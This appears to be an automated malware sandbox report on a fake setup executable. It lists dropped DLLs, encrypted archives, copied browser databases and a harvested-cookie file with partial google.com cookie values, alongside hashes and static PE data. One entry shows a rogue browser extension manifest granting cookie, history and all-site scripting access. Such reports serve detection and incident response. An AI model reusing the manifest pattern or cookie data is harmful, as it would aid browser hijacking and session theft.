                                                                                                                                          SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):92080
                                                                                                                                          Entropy (8bit):5.923150781730819
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                          MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                          SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                          SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                          SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3512776
                                                                                                                                          Entropy (8bit):6.514740710935125
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                          MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                          SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                          SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                          SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):503808
                                                                                                                                          Entropy (8bit):6.4043708480235715
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                          MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                          SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                          SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                          SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):348160
                                                                                                                                          Entropy (8bit):6.56488891304105
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                          MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                          SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                          SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                          SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):59904
                                                                                                                                          Entropy (8bit):6.753320551944624
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                          MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                          SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                          SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                          SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ecvAA35.tmp
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x30c654ce, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26738688
                                                                                                                                          Entropy (8bit):1.0373421482715
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:ASwqTaPxuPgNetECnU6A+MSoVkyHlgSFDb7uBi:dgNetHUN3
                                                                                                                                          MD5:7F8F44331D394627C18A394494E644CB
                                                                                                                                          SHA1:AE070B352546456C1059477147D2FB2C8345A724
                                                                                                                                          SHA-256:F9C1458DEA7DAC086832A4AF55F22E4DDCC45F5D3DCB1C1EF8A861FEC6D5A11A
                                                                                                                                          SHA-512:A61A490ABEACA5B0BE7C7C47B43A91E6E361D51D131A136A6F5FB94316C54016EB3D6F5F28534B480C228FBAD7EF16CB20460179C5AA4558A5D663221BC563C6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 0.T.... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. ........9...y.......................................................................................................................................................................................................................................~.].9...y.g................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:;1033
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):237056
                                                                                                                                          Entropy (8bit):6.262405449836627
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                          MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                          SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                          SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                          SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1397922
                                                                                                                                          Entropy (8bit):7.999863097294012
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                          MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                          SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                          SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                          SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):293320
                                                                                                                                          Entropy (8bit):6.347427939821131
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                          MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                          SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                          SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                          SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Web Data1611946694399
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\crx.7z
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):36105
                                                                                                                                          Entropy (8bit):7.994610469125073
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                          MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                          SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                          SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                          SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                          C:\Users\user\AppData\Local\crx.json
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1981
                                                                                                                                          Entropy (8bit):5.365969892012237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                          MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                          SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                          SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                          SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                          C:\Users\user\AppData\Localwebdata1611946694399
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):103632
                                                                                                                                          Entropy (8bit):6.404475911013687
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                          MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                          SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                          SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                          SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\1611946678493.txt
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):27352
                                                                                                                                          Entropy (8bit):3.707285366791018
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkShU:bqg+flvIKpt3VvODNlkShU
                                                                                                                                          MD5:29AEC990E75D33FD9D7A7F25D68D86C3
                                                                                                                                          SHA1:F12FC5D9371E3034E0458AE532EE737B54946F88
                                                                                                                                          SHA-256:58FA8AC358F9A1506750567E99016D4484492624B2595CFF6B6A0F9202F559AD
                                                                                                                                          SHA-512:19F542A7C4BA558FB4E69B2A0AF7F5C85194F4D17A110C2C900C0CE483271343BC6E9A9FB9D66233C0C650A570AC503235D7F462C4F6D86E48F4A8897DFC611A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.814257274870527
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:FileSetup-v17.04.41.exe
                                                                                                                                          File size:4592400
                                                                                                                                          MD5:b7234e4a9aaaacefa890535f8117c8fc
                                                                                                                                          SHA1:24c4321111ff004105c14e29662682f16900de29
                                                                                                                                          SHA256:a8fefe8e1f92a30d1cdd4e2e2afaacf08a02c8961f496ee16e89062417ec5f28
                                                                                                                                          SHA512:8590be6433943bec0867a18247e25d9821d39db1d06c6957d3895558eb5568dddff0b97acda222f0a16701c50de43d8ad667d6717add6900ec941e71ca28e513
                                                                                                                                          SSDEEP:98304:4u181qMJuVwd7Qld5ElgJQaQsPRT2KJLNx6DfgteKbeOJ:n294g7QxElWQaQyRTXy4vJ
                                                                                                                                          File Content Preview:MZ......................@..................................................L.!This program cannot be run in DOS mode....$.......P,...M.^.M.^.M.^...^.M.^3..^5M.^3..^OM.^.B.^.M.^.B.^.M.^.M.^3L.^.M.^.M.^3..^OO.^3..^/M.^3..^.M.^3..^.M.^Rich.M.^...............

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:f0dcb6a9b792cc78

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x494dd9
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:true
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                          DLL Characteristics:
                                                                                                                                          Time Stamp:0x5603E382 [Thu Sep 24 11:50:26 2015 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
